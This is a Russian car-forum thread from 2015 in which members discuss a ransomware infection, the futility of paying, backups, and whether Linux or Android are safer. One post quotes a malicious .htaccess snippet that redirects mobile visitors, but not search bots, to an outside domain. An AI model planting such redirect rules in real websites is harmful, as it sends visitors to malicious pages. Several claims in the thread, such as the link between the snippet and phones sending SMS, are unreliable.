o9uH
На форуме 19 лет
Сообщения: 165
Откуда: Москва, Бирюлёво
Авто: Калина 8-клоп
Не расшифруешь никак, а бабло если отправишь, то даже на спасибо не надейся
Файлы не поддаются расшифровке т.к. там в конец файлов при шифровании мусор пишется, а при расшифровке выходит кyйня.
Можешь даже не пробовать расшифровывать. А если хочешь попробовать, то открывай WinRar-ом и запускай процедуру восстановления архива, но один хрен ничего не выйдет.
Тут спасут только бекапы, причем на другом компе и не в облаке, т.к. зашифрованные файлы весело синхронизируется в облака и у тя копии зашифрованных файлов в облаке
У меня сеструха так похерила все рабочие базы 1С, открыла письмо от главбушки со сверкой
Спасло, то что были выгрузки БД месячной давности.
Цифра
На форуме 20 лет
Сообщения: 5693
Откуда: Ярославль
Авто: VW Polo Drive 110hp MT
Говорят, что если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают. Хотя можешь попробовать, за счет "нехорошего" человека и ему урок.
Добавлено спустя 46 секунд:
И да, юзайте линукс
Denis
Администратор
На форуме 21 лет
Сообщения: 720
Откуда: Эл-угли и Ногинск МО
Авто: Chevrolet Epica
У меня компания одна обслуживается. И вот директор этой компании на прошлой неделе на домашнем компе поймал такой шифровальщик.
Пробовали разными дешифраторами и т.д. - не помогает.
На вирусинфо кто-то обращался с подобным шифровальщиком, там ответили что дешифровать не смогут.
Если более старые шифровальщики в директории писали файл с контактами, куда отправить бабло. То в этом случае есть только email адрес в названии файлов.
Кстати может коснуться каждого. Лучше не пожалейте 10 тысяч рублей, купите переносной HDD и делайте туда копии фоток и важных файлов.
Антивирусы эту хрень начинают ловить с запозданием.
Последний раз редактировалось: Denis (28 Сентября 2015 10:30), всего редактировалось 1 раз
o9uH
На форуме 19 лет
Сообщения: 165
Откуда: Москва, Бирюлёво
Авто: Калина 8-клоп
Цифра писал(а):если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают
и не пришлют, их просто нет. Кодеры разбирались с этими файлами, я выше писал уже, там мусор пишется в закодированные файлы, даже если и есть декодер, то он раскодирует битые файлы...
Denis
Администратор
На форуме 21 лет
Сообщения: 720
Откуда: Эл-угли и Ногинск МО
Авто: Chevrolet Epica
Цифра писал(а): если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают
а вот кстати не правда. ко мне год-полтора назад знакомые обратились с просьбой о помощи... некогда было ими заниматься, да и не факт что был бы результат.
так вот через неделю у него спросил, как с файлами то дела. он ответил, что всё расшифровали. отправили деньги на контактные данные, им дали дешифратор.
но скорее всего, конечно кинут, если отправить деньги
Victkh
На форуме 18 лет
Сообщения: 4202
Откуда: Питер
Авто: A6Q C5 2.7T мкпп6 + Ваг 3.0tdi жены
В конторе только бекапы, на домашнем компе архивы можно хранить на диске с доступом только админа. А еще лучше не открывать всякие непонятные файлы и скрипты.
Цифра
На форуме 20 лет
Сообщения: 5693
Откуда: Ярославль
Авто: VW Polo Drive 110hp MT
Victkh писал(а):на домашнем компе архивы можно хранить на диске с доступом только админа
Да 99% сидят дома с админскими правами на мэйн аккаунте.
tim1202
На форуме 14 лет
Сообщения: 508
Откуда: город бардюров
Авто: гранта робот
стабильно раз в неделю приходит спам типа от судебных приставов, налоговой с отчетом в архиве экзешник с этой байдой. шифруется всё: доки, фотки, архивы. правится не только начало или конец файла, но и в середине дописывается. так что не восстановить файлы
Extreme
На форуме 15 лет
Сообщения: 3350
Авто: С удовольствием за рулём
забудь, тебе эти файлы уже не вернуть
o9uH
На форуме 19 лет
Сообщения: 165
Откуда: Москва, Бирюлёво
Авто: Калина 8-клоп
Denis писал(а):год-полтора назад
первые версии можно было расшифровать, сча — без вариантов
gallrad писал(а):виндовс г@$но
+100500
Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя.
o9uH
На форуме 19 лет
Сообщения: 165
Откуда: Москва, Бирюлёво
Авто: Калина 8-клоп
Игорь123 писал(а):для их установки требуется активное участие пользователя
из сырцов надо собирать самому?
Mord_vin
На форуме 14 лет
Сообщения: 1133
Откуда: Шамбала
Авто: ИС-3 и Т-34
S597SMRUS писал(а):это не расшифрует
да что ты говоришь
o9uH писал(а):Игорь123 писал(а):для их установки требуется активное участие пользователя
из сырцов надо собирать самому?
А как еще?
Mord_vin
На форуме 14 лет
Сообщения: 1133
Откуда: Шамбала
Авто: ИС-3 и Т-34
Игорь123 писал(а):Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя
ты это Андройду расскажи
Mord_vin писал(а):Игорь123 писал(а):Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя
ты это Андройду расскажи
Там же только ядро на Linux. Хотя, видимо количество вирусов зависит от популярности ОС.
Sergol
На форуме 19 лет
Сообщения: 412
Откуда: Протвино Мск.обл.
Авто: Была и девятка и сарайчик...
Найди того у кого есть лицензионный антивирь - желательно компанию, а не частное лицо. Договорись чтобы они связались с техподдержкой с просьбу на расшифровку. Шанс есть. По крайней мере у нас из 5 случаев заражения разными видами енкодеров, в четырех файлы расшифровали. Правда для одного варианта код расшифровки нашелся месяца через 2-3.
tim1202
На форуме 14 лет
Сообщения: 508
Откуда: город бардюров
Авто: гранта робот
доктор веб отказался от такой услуги, сославшись на то, что пользователь сам запустил шифровальщик
Extreme
На форуме 15 лет
Сообщения: 3350
Авто: С удовольствием за рулём
Mord_vin
покажи мне хоть одну вредоносную программу на андроиде которая запустится сама без моего участия и чем-либо навредит трубе?
ПрапорЪ
На форуме 16 лет
Сообщения: 1125
Откуда: Оттуда
Авто: LADA 104
мдэ... а чтобы эта хренб начала шифровать файлы, она ведь, для начала, должна установиться? Т.е. если скрипт или установочный файл вируса проникнет в систему, то он изначально должен получить разрешение на установку ведь? Я к тому, что виндовый UAC (как минимум) или другой брандмауэр/фаерволл должны известить о том, что "какая-то ху..та пытается запуститься! Разрешить?/Блокировать?"
Mord_vin
На форуме 14 лет
Сообщения: 1133
Откуда: Шамбала
Авто: ИС-3 и Т-34
Extreme писал(а):Mord_vin
покажи мне хоть одну вредоносную программу на андроиде которая запустится сама без моего участия и чем-либо навредит трубе?
установив какой либо непроверенный софт, труба может сама звонить на платные номера, отправлять sms, фотографировать и отправлять фотографии злоумышленнику, вести слежку с помощью GPS и т.д., этого мало ?
и ты не будешь об этом знать, просто в настройках трояна вывод информации на дисплей будет стоять в falsh
вот один из примеров самостоятельно редактирования вирусом всех .htaccess
Цитата:01.
<IfModule mod_rewrite.c>
02.
03.
RewriteEngine on
04.
05.
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
06.
07.
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
08.
09.
RewriteRule (.*) http://comite.ru/?1 [L,R=302] # on
10.
11.
RewriteRule ^([a-z]=.*) index.php?$1 [L,NE]
12.
13.
</IfModule>
Итог: твой телефон сам отправляет sms ки
права root для редактирования .htaccess не нужны
Последний раз редактировалось: Mord_vin (28 Сентября 2015 13:09), всего редактировалось 1 раз
o9uH
На форуме 19 лет
Сообщения: 165
Откуда: Москва, Бирюлёво
Авто: Калина 8-клоп
Alexxx753 писал(а):Я к тому, что виндовый UAC (как минимум) или другой брандмауэр/фаерволл должны известить о том, что "какая-то ху..та пытается запуститься! Разрешить?/Блокировать?"
ты думаешь это останавливает "опытного" пользователя?
у меня сеструха шифровальщика запустила, базы 1С все похерились.
я ей восстановил всё.
через день она решила установить Internet Explorer, который и так в винде есть и ведь установила!
а я потом два дня мудохался вычищал всё
Extreme
На форуме 15 лет
Сообщения: 3350
Авто: С удовольствием за рулём
Mord_vin
ключевое слово УСТАНОВИВ
т.е. пользователь сам себе злобный буратин, если он такой дебил и ставит что непопадя. И то при установке ведроид покажет все разрешения которые требуются программе, что тоже повод задуматься. все вирусы на ведре и линуксе запускаются только с помощью пользователя, в отличие от винды, где вставил заразную флешку и привет
ваще ржу с дебилов ставящих антивирусы на андроид
Mord_vin
На форуме 14 лет
Сообщения: 1133
Откуда: Шамбала
Авто: ИС-3 и Т-34
Extreme писал(а):ваще ржу с дебилов ставящих антивирусы на андроид
а с тех что не ставит
Добавлено спустя 2 минуты 29 секунд:
Extreme писал(а):т.е. пользователь сам себе злобный буратин, если он такой дебил и ставит что непопадя.
а как угадать что поподя, а что нет? проверить софтину (нужная или не нужная) можно только установив на систему
а playmarket забит софтом
Цифра
На форуме 20 лет
Сообщения: 5693
Откуда: Ярославль
Авто: VW Polo Drive 110hp MT
Extreme писал(а):ваще ржу с дебилов ставящих антивирусы на андроид
Ну я такой. Есть лицензия на 3 машины на KIS, две на настольнике и ноуте, а третью куда девать? Заюзал на мобиле.
ИНФОРМАЦИЯ ПО ИКОНКАМ И ВОЗМОЖНОСТЯМ
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы